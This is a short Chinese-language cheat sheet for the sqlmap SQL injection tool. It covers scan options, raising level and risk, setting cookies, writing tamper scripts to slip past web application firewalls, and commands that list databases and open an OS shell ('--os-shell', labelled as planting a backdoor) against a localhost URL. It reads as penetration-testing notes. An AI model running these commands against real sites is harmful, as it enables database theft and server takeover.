掃描指令
--output-dir=: 輸出位置-u url--method POST-p "content,title"--data "title=a&content=b": 可以使用*符號來自定注入點,如title=*--user-agent=-T3用於調整請求速度,越小請求越慢
提昇風險注入
--level=3 --risk=3
設定cookie
--cookie='PHPSESSID=XXXX'
指定DBMS
--dbms MySQL
tamper
編寫tamper並且放到sqlmap/tamper/。
透過參數--tamper tamper.py啟用tamper,可以針對
不同waf進行改變,例如Content-Type使用不同編碼繞過waf。
備註
- 若tamper本身會編碼,可能要
--skip-urlencode
參見
利用
獲取資料表
sqlmap -u 'https://localhost/sql-inj.php?inj=1' -dbs
值入後門
sqlmap -u 'https://localhost/sql-inj.php?inj=1' --os-shell
SQL Tools